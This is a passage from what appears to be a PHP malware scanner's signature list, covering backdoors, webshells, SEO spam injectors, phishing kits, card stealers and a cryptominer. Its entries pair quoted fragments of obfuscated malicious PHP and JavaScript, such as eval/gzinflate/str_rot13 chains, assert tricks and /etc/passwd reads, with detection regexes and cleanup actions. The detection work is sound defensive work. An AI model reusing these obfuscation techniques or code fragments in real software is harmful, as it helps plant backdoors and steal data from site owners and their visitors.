			'echo \'|success|\'.$guid.\'|\';' => array(STR_CLEARFILE, 'php.spam-seo.injector.218', NULL),
			'$_SERVER["HTTP_X_FORWARDED_FOR"]); $_SERVER["HTTP_USER_AGENT"] = str_replace(array(' => array(STR_CLEAR_LINEMATCH, 'php.malware.generic.063', '\$_SERVER\[.HTTP_X_FORWARDED_FOR.\]\s*=\s*str_replace\(array\(.feed_url.\,\s*.\w+.\),array\(.\w+.\,\s*.\w+.\),\s*\$_SERVER\[.HTTP_X_FORWARDED_FOR.\]\);\s*\$_SERVER\[.HTTP_USER_AGENT.\]\s*\=\s*str_replace\(array\(.\w+.,\s*.\w+.\),\s*array\(.\w+.,\s*.\w+.\),\s*\$_SERVER\[.\w+.\]\);'),
			'$ipcheck = str_replace(\'<t@k>\',"",$html);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.067', '<\?php\s*\$html = geth\(\);[^\0]+function geth\(\)[^>]+?function CheckAgent\(\)[^>]+\}\s*\?>\s*<script src="[^>]+><.script>'),
			';$wpconfigstr=str_replace($settingsstring,$newwpsettings,$source);if(!is_writeable($filename)){@unlink($filename);}file_put_contents($filename' => array(STR_CLEARFILE, 'php.spam-seo.injector.113', NULL),
			'_content = str_replace(\'position:fixed !important; left:-9999px !important;\', \'\', $__' => array(STR_CLEARFILE, 'php.spam-seo.viaWorm.001', NULL),
			'$p=str_replace(\'href="\',\'href="./wp-index.php?Q=\',$p);' => array(STR_CLEARFILE, 'php.redirect.header_location.025', NULL),
			'$prostyn.= "<a href=http://".$host.$urit.str_replace' => array(STR_CLEARFILE, 'php.spam-seo.injector.072', NULL),
			'<div class="element-separator"><hr><h3 class="section-break-title">Payment Details</h3></div>' => array(STR_CLEARFILE, 'php.phishing.mailer.042', NULL),
			'str_replace(\'##amount_refund##\'' => array(STR_CLEARFILE, 'php.phishing.gov_uk.004.02', NULL),
			'\([\'"][\w]+[\'"],[\s]*[\'"][\'"][\s]*,[\s]*[\'"][\w]{0,8}c[\w]{0,8}r[\w]{0,8}e[\w]{0,8}a[\w]{0,8}t[\w]{0,8}e[\w]{0,8}_[\w]{0,8}f[\w]{0,8}u[\w]{0,8}n[\w]{0,8}c[\w]{0,8}t[\w]{0,8}i[\w]{0,8}o[\w]{0,8}n[\w]{0,8}[\'"]\);' => array(REX_CLEAR_MULTIMATCH, 'rex.create_function.003', '(\$[\w]+[\s]*=[\s]*\'[^\']+\';(\/\/[^\$]+)?[\s]*|\$[\w]+[\s]*=[\s]*"[^"]+";(\/\/[^\$]+)?[\s]*|\$[\w]+[\s]*=[\s]*str_replace\([^;]+;(\/\/[^\$]+)?[\s]*|\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"][\w]+[\'"][\s]*,[\s]*[\'"]{2}[\s]*,[^;]+\);(\/\/[^\$]+)?[\s]*){3,}\$[\w]+[\s]*=[\s]*\$[\w]+\([\'"]{2}[\s]*,[\s]*\$[^)]+\)+;[\s]*(\/\/)?[\s]*\$[\w]+\(\);'),
			'foreach(str_split($session_keys, 8' => array(STR_CLEAR_MULTIMATCH, 'php.malware.corelibrarieshandler.001', '<.php\s*\/\*\*\s*\* Gets some core lib[^>{]+?function CoreLibrariesHandler.. \{\s*\/\*[^\$\(>]+\$session_keys =[^\?]+\*{20}\/\s*\?>'),
			'eval(str_replace(\'Mozilla' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_USER_AGENT.001', 'if[\s]*\(eregi\("[^,]+,\$_SERVER\[.HTTP_USER_AGENT.\]\)\)[\s]*\{[\s]*eval\(str_replace\(.Moz[^}]+die;[\s]*\}'),
			'$currentCMD = str_replace("\\\\","\\",$_POST[\'_cmd\']);' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.060', NULL),
			'$url = str_replace(\'LOCATION: \', \'\', $decoded[\'redirect\'][\'headers\'][0]);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.058', '<.php[\\s]*\\$host = "[^"]+";[\\s]*\\$query = ".action=get_link&api_key=[^;]+;[\\s]*\\$[\\w]+ = curl_init[^>]+echo "<iframe  src=....\\$url.....width=..1." height=..1."><.iframe>";[\\s]*}[\\s]*\\?>'),
			'echo str_replace(\'LinkMaster' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.LinkMaster.001', 'function ([\w]+)\(\)[\s]*\{[\s]*(\$to|error_reporting)[^}]+echo[\s]*str_replace\([\s]*.LinkMaster[^;]+\);[\s}]+(\1\(\);|add_action\(.[\w]+.,[\s]*.\1.\);)'),
			'str_replace(" ","","\x65\x76' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.004', 'preg_replace[^;]+str_replace\("\s"[^x]+x[^;]+\w{5,}.\);'),
			'$replaced = str_replace($needle, $needle.$gencode, $general_template);' => array(STR_CLEARFILE, 'php.backdoor.generic.021', NULL),
			'"","axsxxsxexrxxt")' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.assert.004', '<\?php\s*(\$\w+)\s*=\s*str_replace.x,"","axsxxsxexrxxt".;\s*\1.\$\w+\[[^\]]+\]\);\s*\?>'),
			'else{echo "<sy>No Results !! .</sy>";ob_flush();flush();return false;}' => array(STR_CLEARFILE, 'php.backdoor.generic.067', NULL),
			'crkekatkek_kfkukncktkikon' => array(STR_CLEARFILE, 'php.backdoor.create_function.013', NULL),
			'preg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);' => array(STR_CLEARFILE, 'php.hacktool.configuration_stealer.017', NULL),
			'str_replace("[t1]", "<?", $resource_crypted_code);' => array(STR_CLEARFILE, 'php.backdoor.filesman.122', NULL),
			'_il_exec\')){return _il_exec();}echo(\'Morphine kit require PHP' => array(STR_CLEARFILE, 'php.hacktool.morphine_kit.001', NULL),
			'rX0Ne9rGEu5fUdScAq2N+SY1xolr48S3ju0D+LS9SR6OAGHUACK' => array(STR_CLEARFILE, 'php.backdoor.filesman.131', NULL),
			'DUyNzg3J10pKXsNCiAgJGV' => array(STR_CLEARFILE, 'php.malware.require_once-injection.011', NULL),
			'$body = fix_dirs($body, $folder);' => array(STR_CLEARFILE, 'php.spam-seo.injector_gen.029', NULL),
		),

		'str_rot13' => array(STR_TRIGGER,    
		
			'base64_decode' => array(STR_TRIGGER,
		
				'(gzinflate' => array(STR_TRIGGER,
		
					'eval(str_rot13(gzinflate(str_rot13(base64_decode(' => array(STR_TRIGGER,
						'\$[\w]+[\s]*=[\s]*[\'"][^;]{3000}[^;]+;[\s]*eval\(str_rot13' => array(REX_CLEARFILE, 'php.backdoor.webshell_gen.086', NULL),
						'sLafY7ZtkhIFAWZIdw9IpOlHu7/Yf2RrPdDLf8dh2XBkP8' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.317', 'eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\([^;]+\);'),
						'LF3HsqXAjvyaiWxY/IEl3nvPcwLvvefrB2G/6IiO7ng4QyWlMiWVS' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.319', 'eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\([^;]+\);'),
						'LUnHDrZVDnya0fx7IwftiRw+ZYb' => array(STR_CLEARFILE, 'php.backdoor.uploader.383', NULL),
					),
		
					'(gzinflate(str_rot13(base64_decode(' => array(STR_TRIGGER,
						'aJBfeIMwFMWfLfQ7hFihFjZ979T2bnoZDDZjYqVV1EtQjQkmGZXR7754aH8c' => array(STR_CLEARFILE, 'php.backdoor.uploader_gen.017', NULL),
						'KpthyZpg2YU+gpHqXah2GL3kEBLvpZiLtTbDly' => array(STR_CLEARFILE, 'php.backdoor.webshell.233', NULL),
					),
		
					'str_rot13(gzinflate(str_rot13(base64_decode(($' => array(STR_TRIGGER,
						'7b1sWyLJszD6t/08/R1Fxt+UnklJZHroTgVqFEdcuvtrq6qrChF4A' => array(STR_CLEARFILE, 'php.backdoor.webshell.209', NULL),
					),
		
					'aIeew2ESSs9Kyf649N3AcXch1K3Z2QhsvO' => array(STR_CLEARFILE, 'php.malware.redirect.008', NULL),
					'eval(gzinflate(str_rot13(base64_decode(\'FJ3Hj' => array(STR_CLEARFILE, 'php.backdoor.filesman.084', NULL),
					'eval(str_rot13(gzinflate(str_rot13(base64_decode($' => array(STR_CLEARFILE, 'php.backdoor.filesman.084.02', NULL),
					'eval(gzinflate(base64_decode(str_rot13(\'aIiew2EUqs9KqyhqqI/EUgKeidMmqm5M+otEEUku9b5zrz7iGwj7Z3G3xQTey' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.117', '(?<=<\?php\s)\$\w+\s*=\s*\d+\s*;\s*eval\s*\(gzinflate\(base64_decode\(str_rot13\([^\)]+\)\s*\)\s*\)\s*\)\s*;(?=\s*\?>)'),
					'rUnrQuM4EP+8VfwPxkp6RS2kPJbdFRAEgrCL7nW5ttwXQESauK1YX' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.126', 'eval\(gzinflate\(str_rot13\(base64_decode\([^;]+\);'),
					'7Ux6Zts2Ev58nvF/S7O6Q5pNouz6TZ8iqo09' => array(STR_CLEARFILE, 'php.backdoor.webshell.177', NULL),
					';eval (gzinflate (base64_decode (str_rot13 (' => array(STR_CLEARFILE, 'php.spam-seo.redirect.109', NULL),
					'eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZns' => array(STR_CLEARFILE, 'php.backdoor.uploader.385', NULL),
				),
		
				'= implode("", $' => array(STR_TRIGGER,
					'= array(\'' => array(STR_TRIGGER,
						'= false;$' => array(STR_TRIGGER,
							'= true;$' => array(STR_TRIGGER,
								'= "";$' => array(STR_TRIGGER,
									'= "gzuncompress";' => array(STR_TRIGGER,
										'= "base64_decode";' => array(STR_TRIGGER,
											'= "str_rot13";' => array(STR_TRIGGER,
												'))));' => array(STR_TRIGGER,
													';eval(' => array(STR_CLEARFILE, 'php.backdoor.filesman.048', NULL),
												),
											),
										),
									),
								),
							),
						),
					),
				),
		
				
				'$host =' => array(STR_TRIGGER,
					'(preg_match(\'/^HTTP\/1[.][01] 404/Usi\', $header)) header($header);' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.002.19', NULL),
				),

				'gzinflate(str_rot13(base64_decode($f1b3r))));' => array(STR_CLEARFILE, 'php.backdoor.CodeNewbieCrew-shell.001', NULL),
				'eval(base64_decode(str_rot13(strrev(' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.002.004', 'eval.base64_decode.str_rot13.strrev.base64_decode.str_rot13.\$_POST[^>;]+;'),
				'$_z=create_function("",$z); @$_z(); }' => array(STR_CLEAR_LINEMATCH,'php.backdoor.dbload.004', '(\$\w+)=get_option\([^;]+;\s*\1=base64_decode\(str_rot13\(\1[^}]+(\$_\w+)=create_function\(..,\1\);\s*\@?\2\(\);\s*\}'),
				'7X12e6PGsvB052zyHzjEN7KvPBZPu3o50Yb2fdfMPD6AS7SxgwTn5P72292ABJI8W2Vm3g+vJ7' => array(STR_CLEARFILE, 'php.hacktool.cpanel_bruteforce.013', NULL),
			),
		
			'onfr64_qrpbqr' => array(STR_TRIGGER,
				'=str_rot13\([^;]+fge_ebg13[^;]+;\$' => array(REX_CLEARFILE, 'rex.backdoor.webshell.001', NULL),
				'(strrev(\'/0///973' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.webshell_gen.079', '\$\w+="\w*";\s*(\$\w+)=str_rot13..onfr64_qrpbqr..;\s*(\$\w+)\s*=\s*str_rot13..tmvasyngr..;\s*\$\w+="\w*\";\s*eval.\2.\1.strrev...0...973[^\)]+?\)\)\)\);'),
				'$a=\'rt\'; $b=\'as\'; $b.=\'se\' . $a;@$b(' => array(STR_CLEARFILE, 'php.backdoor.assert.015', NULL),
				'pTjpdqLY1v/zFMT4dTQmCiIOnaI6ioAjIohTp' => array(STR_CLEARFILE, 'php.hacktool.ddos.007', NULL),
				'eval("\$a = $funcName(\"$input\");");' => array(STR_CLEARFILE, 'php.backdoor.webshell.093', NULL),
				'VtbXk=\')."/i", serialize($_POST)))' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.071', 'if[\s]*\(preg_match\("."\.base64_decode\(.[^;]+Xk=.\)\.".i", serialize\(\$_POST\)\)\)\{[\s]*\$[\w]+[\s]*=[\s]*str_rot13[^}]+curl_close\(\$[\w]+\);[\s]*\}'),
				'assert_options( ASSERT_WARNING, 0 ); assert_options( ASSERT_QUIET_EVAL, 1 ); $' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.assert.026', 'assert_options\( ASSERT_ACTIVE[^;]+;[\s]*error_reporting\(0\);[\s]*assert_options\( ASSERT_WARNING, 0 \); assert_options\( ASSERT_QUIET_EVAL, 1 \); \$[\w]+[^(]+\(str_rot[^;]+;.\)\);'),
			),
		
			'riny' => array(STR_TRIGGER,
				'@$strings(str_rot13(\'riny(onfr64_qrpbqr(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.054.02', '(?:\/\/###(?:=CACHE START=|=+?)?###\s*)?(?:error_reporting.0.;\s*)?\$strings\s*=\s*"a[^<\}\']+?\@\$strings.str_rot13..riny\(onfr64_qrpbqr\("[^"\)]+"\)\);.\)\);\}?(?:\s*\/\/###(?:=CACHE END=|=+?)?###\s*)?'),
				'@assert(str_rot13(\'riny(onfr64_qrpbqr' => array(STR_CLEAR_MULTIMATCH,'php.malware.generic.054', '(\/\/######\s*)?\@assert.str_rot13..riny[^<\{]+?\'\)\);(\s*\/\/######)?'),
				'\k65\k76\k61\k6P\k28\k67\k7N\k69\k6R\k66\k6P' => array(STR_CLEARFILE, 'php.backdoor.str_rot13.005', NULL),
			),
		
			'mkdir(' => array(STR_TRIGGER,
				'."\n";' => array(STR_TRIGGER,
					'){unlink($' => array(STR_TRIGGER,
						', 0777);' => array(STR_TRIGGER,
							'php\')) die();' => array(STR_TRIGGER,
								'php\', w); fwrite($' => array(STR_CLEARFILE, 'php.backdoor.uploader.089', NULL),
							),
						),
					),
				),
			),
		
			'function curl($' => array(STR_TRIGGER,
				'$timeout' => array(STR_TRIGGER,
					'echo curl(str_rot13("ugg' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.300', 'function curl\(\$[^\)]+\)[\s]*\{[\s]*\$[\w]+[\s]=[\s]*curl_init\(\);[\s]*\$timeout[^\}]+\}[\s]*echo curl\(str_rot13[^;]+\);'),
				),
			),
		
			'@filemtime' => array(STR_TRIGGER,
				'@file_get_contents(str_rot13(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.243', '\/\/[#!=]{10,}[\s]*\$time_sec[\s]*=[\s]*time\(\);[\s]*\$time_file[\s]*=[\s]*@filemtime[^:]+@file_get_contents\(str_rot13[^#]+\/\/[#!=]{10,}'),
			),
		
			'CURLOPT_URL,str_rot13(\'ugg' => array(STR_TRIGGER,
				'preg_replace(\'/<body([^>]+)>/\', \'<body\\\\1>\'.$server_output' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.299', 'function[\s]*[\w]+\(\)[\s]*\{[\s]*function [\w]+\(\$buffer\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*curl_init\(\);[\s]*curl[^:]+ugg[^\}]+\}[\s]*ob_start[^\{]+\{[\s]*[\w]+\(\);[\s]*\}'),
			),
		
			'.pack(\'H*\'' => array(STR_TRIGGER,
				'66756r6374696s6r20737472646972282473747229207o2072657475726r' => array(STR_CLEARFILE, 'php.backdoor.webshell.196', NULL),
			),

			'str_rot13(\'cert_ercynpr' => array(STR_CHAIN_TRIGGER,
				'str_rot13(\'cert_ercynpr\')' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.04', '\$\w+\s*=\s*str_rot13..cert_ercynpr..;\s*\$\w+[^;]+;\s*\$\w+\(\$\w+,\s*[^\^]+\^[^;]+;'),
				'[\'pas\']' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.001.09', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_POST[\s]*\[.pas.\][\s]*\)[\s]*\&&[\s]*\([\s]*md5[^\}]+\}[\s]*'),
			),
		
			'fwrite($csached, $datalinks);' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.datalinks.001', '<\?(php)?[^_]+\$servername\s*=\s*\$_SERVER..SERVER_NAME..;\s*\$url\s*=\s*str_rot13..uggc:..\w+\.\w+[^\?]+\?\w+=.\);[^>]+echo\s\$datalinks;\s*(\}\s*)+(\?>)'),
			'<n uers="uggc:' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.theme_link_spam.001', 'eval\(str_rot13\(.shapgvba[^@]+;.\)\);'),
			'shapgvba purpx_urnqre(){vs(!(shapgvba_rkvfgf' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.theme_link_spam.002', '\beval.str_rot13..shapgvba purpx_urn[^\}]+?vagnpg..\);qvr;\}\}.\)\);'),
			'= str_rot13(\'n\'.\'f\'.\'f\'.\'r\'.\'e\'.\'g\'' => array(STR_CLEAR_MULTIMATCH, 'php.malware.strrev.006', '(if[\s]*\(isset\(\$_POST\[[^\]]+\]\)\)[\s]*\{[\s]*)?\$[\w]+[\s]*=[\s]*str_rot13\(.n.[\s]*\.[\s]*.f.[\s]*\.[^;]+\);[\s]*\$[\w]+\(\$_POST\[[^;]+\);[\s]*\}?'),
			'eval(gzinflate(str_rot13(base64_decode(\'zUlbQttVFH5e' => array(STR_CLEARFILE, 'php.backdoor.webshell.082', NULL),
			'eval(gzinflate(str_rot13(base64_decode(\'rUl6QttVEP5eqf9u' => array(STR_CLEARFILE, 'php.backdoor.webshell.082.02', NULL),
			'=str_rot13(chr(114).chr(105).chr(110).chr(121));eval(strrev(\'};)' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.034', NULL),
			'@create_function ( \' \', str_rot13 ( \'riny( $_CBFG' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.001', '\$\w+\s*=\s*@create_function[^;]+str_rot13[^;]+riny\(\s*\$_CBFG[^;]+;[^;]+;@\$\w+\(\);'),
			'if(!PE && !IW){if(@is_readable(\'/etc/passwd\')){' => array(STR_CLEARFILE, 'php.backdoor.pas_webshell.002', NULL),
			'strpos($_SERVER[\'REQUEST_URI\'], str_rot13("trarevp")' => array(STR_CLEAR_MULTIMATCH, 'php.redirect.header_location.029', 'get_header\s*\(\s*\)\s*;\s*if\s*\(\s*\(\s*strpos\(\$_SERVER\[\'REQUEST_URI\'], str_rot13\("trarevp"\)[^;]+?;\s*header\s*\(\s*["\']Location:[^;]+?;\s*exi[^;]+?;\s*\}\s*else\s*if\s*\(\s*strpos[^,]+?,\s*str_rot13\s*\(\s*["\']trarevp[^!]+?!==\s*false\s*\)\s*\{\s*get_header\s*\(\s*\)\s*;\s*\}'),
			'$Ldkrw = create_function(null, $Ldkrw);' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.001', NULL),
			'rawurldecode(\'%62\' . \'%61\' . \'%73\' . \'%65%3\' . \'6%34%\' . \'5f%\'' => array(STR_CLEARFILE, 'php.backdoor.cookie.013', NULL),
		),

		'echo "ok' => array(STR_TRIGGER,
			'$indexStr = str_replace("' => array(STR_TRIGGER,
				'$installStr = file_get_contents("' => array(STR_CLEARFILE, 'php.spam-seo.injector.219', NULL),
			),
		),
	
		'$zip = new ZipArchive;' => array(STR_TRIGGER,
			'str_ireplace(\'.txt\',\'.php\'' => array(STR_CLEARFILE, 'php.backdoor.uploader.402', NULL),
		),

		'$pageTxt = $req->request(str_rot13(\'uggc' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.036', 'class ___php_http_request[^@]+@curl_setopt[^@]+function __php_request_wrapper[^<]+function die404[^@]+new __php_request_wrapper..;'),
		',"?bot1"))&&(!substr_count($' => array(STR_CLEARFILE, 'php.spam-seo.injector.073', NULL),
		'$redirect = str_replace("XXXXXXXXXXXXX' => array(STR_CLEARFILE, 'php.spam-seo.bkeyword.001', NULL),
	),
	
	'if(str' => array(STR_TRIGGER,
	
		'=&$_COOKIE;$' => array(STR_TRIGGER,
	
			'=http_build_query(' => array(STR_TRIGGER,
				'=false)header(' => array(STR_CLEARFILE, 'php.spam-seo.header_location.023', NULL),
			),
	
			';if(!empty($R)){foreach($R as $g=>$u){if($T)$T.=' => array(STR_CLEARFILE, 'php.spam-seo.redirect.058', NULL),
			'foreach($server as $cn=>$cv)$server[$cn]=$cn.\'=\'.urlencode(strval($cv));$post=implode(\'&\',$server);' => array(STR_CLEARFILE, 'php.spam-seo.injector.223', NULL),
		),
	
		'("cGFjaw==");' => array(STR_TRIGGER,
			'("aGV4MmJpbg==");' => array(STR_TRIGGER,
				'("Y3JlYXRlX2Z1bmN0aW9u");' => array(STR_CLEARFILE, 'php.backdoor.symlink-sa.006', NULL),
			),
		),
	
		'curl_setopt($ch,CURLOPT_URL, $url);' => array(STR_TRIGGER,
			'public function saleCreated(Varien_Event_Observer $observer)' => array(STR_TRIGGER,
				'$url = \'http:' => array(STR_CLEARFILE, 'php.malware.magento-cc-stealer.040', NULL),
			),
		),
	
		'=@$_GET[' => array(STR_TRIGGER,
			'src="\'.base64_decode($' => array(STR_TRIGGER,
				';echo outdo($' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.169', 'header..Content[^)]+\\);[\\s]*@set_time_limit.0.;[^}]+@\\$_GET[^>]+iframe[^>]+base64_decode\\(\\$[^}]+exit;}[^}]+}[^>]+echo outdo[^>]+return[\\s]*\\$[\\w]+;}'),
			),
		),
	
		'if(stripos($_SERVER[\'HTTP_USER_AGENT\']' => array(STR_TRIGGER,
			'".trim($_GET[\'uu\']).".html");' => array(STR_CLEARFILE, 'php.spam-seo.redirect.033', NULL),
		),
	
		'nclude "send.php";' => array(STR_TRIGGER,
			'if($_POST[Exmoth] < gmdate("m") and $_POST[Exyear] == gmdate("Y")){' => array(STR_CLEARFILE, 'php.phishing.generic.025.02', NULL), 
		),
	
		'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']),' => array(STR_TRIGGER,
			'include(getcwd().\'/' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.016', 'if.strpos.strtolower.\\$_SERVER..REQUEST_URI...,\'[\\w_-]+.\\)\\)\\{\\s*include.getcwd[^;]+;[\\s]*exit;}'),
		),
	
		'if(strpos($houzhui,\'index.php\') != false' => array(STR_CLEARFILE, 'php.spam-seo.injector.109', NULL),
		'if(strstr($htmls,"#prodescription#"))' => array(STR_CLEARFILE, 'php.spam-seo.injector.119', NULL),
		'if(strpos($m[2],"http://") !== 0 && strpos($m[2],"https://") !== 0 && strpos($m[2],"//") !== 0 ){' => array(STR_CLEARFILE, 'php.spam-seo.stylesshets_com.003', NULL),
		'\' action="./loge.php?cmd=_login-submit&dispatch=58' => array(STR_CLEARFILE, 'php.phishing.paypal.001.02', NULL,1),
		'$res_el[\'linkerror\'] == \'3\') $double_links[$i] = $all_links_o[($i-1)];' => array(STR_CLEARFILE, 'php.spam-seo.injector.155', NULL),
		'if(strlen($PIN) < 4 || strlen($ACN) < 4){' => array(STR_CLEARFILE, 'php.phishing.generic.033', NULL),
		'$linksToInsert = implode(array_slice($contentArray, 0, $_POST[' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.017.03', NULL),
		'stripos($_GET["p"],\'ugg' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.067', 'ini_set\(.display_errors.,.0.\);[\s]*define[^;]+;[\s]*\$flag[\s]*=[\s]*false;[\s]*\$[\w]+[\s]*=[\s]*\$_SERVER..HTTP_USER_AGENT.\];[\s]*if.stripos.\$[\w]+,[^>]+stripos\(\$_GET\[.[\w]+.\],.ugg[^>]+include_once[^;]+;[\s]*}'),
		'array_push($body,"%1$tags%3",$text,"%2$tags%3");' => array(STR_CLEARFILE, 'php.spam-seo.injector.229', NULL),
	),
	
	'substr' => array(STR_TRIGGER,
	
		'(function(){var' => array(STR_TRIGGER,
	
			'\').substr(0,' => array(STR_TRIGGER,
				'(); })()' => array(STR_TRIGGER,
					'.length;var' => array(STR_TRIGGER,
						'=[];for(var' => array(STR_TRIGGER,
							'\(function\(\)\{var [\w]+=..,[\w]+=[\d]+;function [\w]+\([\w]+\)\{var [\w]+=[\d]+;var [\w]+=[\w]+\.length;var [\w]+=\[\];for\(var' => array(REX_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.042', '\(function\(\)\{var [\w]+=..,[\w]+=[\d]+;function [\w]+\([\w]+\)\{var [\w]+=[\d]+;var [\w]+=[\w]+\.length;var [\w]+=\[\];for\(var[^\x02]+\(\); \}\)\(\);?'),
						),
					),
				),
			),
		),
	
		'function is_mobile()' => array(STR_TRIGGER,
			'$user_agent=strtolower(getenv(\'HTTP_USER_AGENT\'));' => array(STR_TRIGGER,
				'if (in_array(substr($user_agent' => array(STR_TRIGGER,
					'(strpos($accept,\'application/vnd.wap.xhtml+xml\')!==false))' => array(STR_CLEARFILE, 'php.phishing.script.008', ''),
				),
			),
		),
	
		'date=new Date()' => array(STR_TRIGGER,
			's+=ar.substr(pos,1);}e(s);' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.001.02', 'date=new Date..;var \w+=".+s\+=ar\.substr\(pos,1\);\}e\(s\);'),
		),
	
		'if(@socket_connect' => array(STR_TRIGGER,
			'mxs.mail.ru' => array(STR_CLEARFILE, 'php.hacktool.portscan.001', NULL),
		),
	
		'$urls[$request_count] = "ftp://" . $login . ":" . $password . "@" . $domain;' => array(STR_CLEARFILE, 'php.hacktool.downloader.006', NULL),
		'substr("class",2)' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.assert.022', '(\$[\w]+)[\s]*=[\s]*substr\(.class.,2\)[\s]*\.[^;]+;[\s]*@?[\s]*\1[\s]*\([\s]*\$[\s]*\{[^}]+\}[\s]*\[[^\]]+\][\s]*\)[\s]*;'),
		'var server="wss://webminerpool.com' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.018', 'var server="wss:..webminerpool\.com:[\d]+..,job=null[^@]+startMining\([^;]+\);'),
		'.@$_(cve(' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.cve.001', 'function cve.\$str,\$key\)\s*\{\s*\$t=..;\s*for\([^\@]+\}\s*\(\@\$_=cve\(.6[^\)]+\)\)\.\@\$_\(cve\([^\)]+\)\);'),
		'$localpath));include_once(' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.020', 'error_reporting\(0\);[^>]+strpos\(\$absolutepath,\$localpath\)\);include(_once)?\([^)]+\.[\w]{1,4}.\);'),
	),

	'strre' => array(STR_TRIGGER,
	
		'edoced_46esab' => array(STR_TRIGGER,
	
			'sserpmocnuzg' => array(STR_TRIGGER,
				'noitcnuf_etaerc' => array(STR_TRIGGER,
					'= strrev($' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.create_function.017', '(\$\w+)\s*=\s*[\'"]edoced_46esab[\'"]\s*;\s*(\$\w+)\s*=\s*[\'"]sserpmocnuzg[\'"]\s*;\s*(\$\w+)\s*=\s*[\'"]noitcnuf_etaerc[\'"]\s*;[^\1]+(\$\w+)\s*=\s*\@?\2\(\@?\1\(\4\)\s*\)\s*;\s*if\s*\(\!empty\(\4\)\)\s*{\s*\3\s*=\s*strrev\(\3\)\s*;\s*\@?\3\([\'"]{2},\s*\4\)\s*;\s*}\s*}'),
				),
			),
	
			'_PTTH[REVRES_$(edoced_46esab(lave\'));@$' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.create_function.020', 'error_reporting\(0\);[\s]*\$[\w][\s]*=[\s]*[\'"][\w]+[\'"][\s]*\.[\s]*[\'"][\w]+[\'"];[^\$]+\$[\w][\s]*=[\s]*@\$[\w]\(..,[\s]*strrev\(.;\)\)\][\w]+\[REVRES_\$\(edoced_46esab\(lave.\)\);[\s]*@\$[\w]\(\);'),
		),
	
		'$a\',strrev(\';)a$(lave\'));' => array(STR_TRIGGER,
			'"(edoced_46esab(lave\'));' => array(STR_TRIGGER,
				'chr(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.043', '\$[\w]+[\s]*=[\s]*[^;]*(chr\(|\."\\\\x)[^;]*;[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\(.....strrev....a\$.lave[^$]+\$[\w]+\([\s]*strrev\(.;[^;]+edoced_46esab.lave...;'),
				'create_function(\'$a\',s' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway-gen.043.02', '\\$[\\w]+[\\s]*=[\\s]*create_function...a..strrev..;.a..lave.\\)\\);[\\s]*\\$[\\w]+\\([\\s]*strrev\\(.;[^;]+edoced_46esab.lave...;'),
			),
		),
	
		'_POST' => array(STR_TRIGGER,
			'if(isset($_POST[' => array(STR_TRIGGER,
				'$array[] = $item;' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.assert.014', 'if.isset.._POST[^\)]+\)\)\{\s*\$item\[[^\]]+\]\s*=\s*strrev\([^\);]+\);\s*\$array\[\]\s*=\s*.item;[^\$\};]+\$array\[0\]\[[^\;]+;(?:exit..;)?\}'),
			),
		),
	
		'foreach(${$' => array(STR_TRIGGER,
			'if(!empty(${$' => array(STR_TRIGGER,
				'():\'\';}' => array(STR_CLEARFILE, 'php.malware.create_function.020', NULL),
			),
		),

		'thawte.com-' => array(STR_TRIGGER,
			'$track_id.$captureNote' => array(STR_CLEARFILE, 'php.backdoor.filesman.030', NULL),
		),
	
		'@$_("' => array(STR_TRIGGER,
			'$_ = strrev("tress' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.003.03', '\$_ = strrev\("tress[^;]+; \@\$_\("[^\);]+\);'),
		),

